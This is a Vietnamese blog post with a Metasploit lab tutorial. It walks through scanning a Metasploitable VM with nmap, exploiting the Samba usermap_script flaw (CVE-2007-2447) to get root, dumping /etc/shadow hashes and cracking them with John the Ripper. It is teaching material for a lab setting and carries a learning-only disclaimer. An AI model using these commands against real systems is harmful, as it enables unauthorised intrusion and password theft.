Thứ Ba, 19 tháng 11, 2013

Bài Thực Hành Metasploit Framework Lesson 10 : Exploiting Samba, Obtain Hashes, John the Ripper

{ Exploiting Samba, Obtain Hashes, John the Ripper }

Section 0. Background Information
  1. Metasploitable 
  2. Pre-Requisite Lab
    • Metasploitable  : Lesson 1: Downloading and Configuring
  3. Exploit CVE 2007-2447
    • The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
    • The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking externals scripts defined in smb.conf.
    • http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447
  4. Other References
  5. Lab Notes
    • In this lab we will do the following:
      1. Run an intense NMAP Scan on the Metasploitable VM
      2. Search for the samba daemon
      3. Use Metasploit to exploit the samba daemon to obtain root
      4. Obtain the Hashes from the /etc/shadow file
      5. Use John the Ripper to break the Password Hashes
  6. Legal Disclaimer - Chỉ dùng trong môi trường học tập

Section 1. Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer
  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine
  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button
  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings
  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • By changing from NAT to Bridged opens the VM and network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.
  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

Section 2. Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.
  2. Change the msfadmin password
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.112.
      • Record your IP Address.

Section 4. Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer
  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine
  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button
  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  8. Bring up the GNOME
    • Instructions:
      1. Type startx
  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.108.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

Section 5. Scanning the Victim with NMAP
  1. Run Intense NMAP Scan against the Metasploitable VM
    • Instructions:
      1. Obtain your Metasploitable IP address from (Section 2, Step 2)
      2. In the following step, replace 192.168.1.112 with your Metasploitable IP address.
      3. nmap -p 1-65535 -T4 -A -v 192.168.1.112 2>&1 | tee /var/tmp/scan.txt
    • Note(FYI):
      • The BackTrack VM will use NMAP to scan the Metasploitable VM.
      • This intense NMAP scan could take 3 to 5 minutes to run.
  2. Looking for distccd
    • Instructions:
      1. cd /var/tmp
      2. grep -i samba /var/tmp/scan.txt
    • Note(FYI):
      • Samba usually runs on ports 139 and 445.

Section 6. Attacking the Victim with Metasploit
  1. Start Up Metasploit msfconsole
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.
  2. msfconsole screen
    • Note(FYI):
      • This is the msfconsole
      • Your picture (Rabbit, Cow, Graffit, Cyber Missle, etc) will probably be different than mine.
  3. Search for Metasploit Module
    • Instructions:
      1. search samba
      2. Highlight exploit/multi/samba/usermap_script
      3. Select Copy
  4. Set Metasploit Module
    • Instructions:
      1. use exploit/multi/samba/usermap_script
    • Note(FYI):
      • This the name of the exploit that will be used to attack Samba.
  5. Set the RHOST (a.k.a., Victim) IP Address
    • Note(FYI):
      • Replace 192.168.1.112 with the Metasploitable IP Address obtained from (Section 2, Step 2).
    • Instructions:
      1. show options
      2. set RHOST 192.168.1.112
      3. show options
  6. Exploit and Background Session
    • Instructions:
      1. exploit
      2. Press <Ctrl> and "z" at the same time
      3. Background session 1? [y/N] y
      4. Press <Enter>
      5. sessions -l
        • "l" as in larry

Section 7. Obtain /etc/shadow Hashes
  1. Obtain /etc/shadow Hashes
    • Note(FYI):
      • For step 7.1.2, see picture below when setting the SESSION variable.
    • Instructions:
      1. use post/linux/gather/hashdump
      2. show options
      3. set SESSION 1
      4. exploit
        • This will display the password hashes for each username.
      5. Highlight Unshadowed Password File (See Picture).
      6. Select Copy

Section 8. Using John the Ripper
  1. Start up another terminal window
    • Instructions:
      1. Click on the Terminal Window
  2. Running John the Ripper
    • Note(FYI):
      • For step 8.2.2, paste the file you copied from (Section 7, Step 1).
    • Instructions:
      1. cd /pentest/passwords/john/
      2. ./john /root/.msf4/loot/20130519223146_default_192.168.1.112_linux.hashes_533267.txt

Section 9. Proof of Lab
  1. Proof of Lab
    • Instructions
      1. cd /root/.msf4/loot
      2. ls -lrta
      3. date
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to website Www.AnToanThongTin.Edu.VN

Không có nhận xét nào:

Đăng nhận xét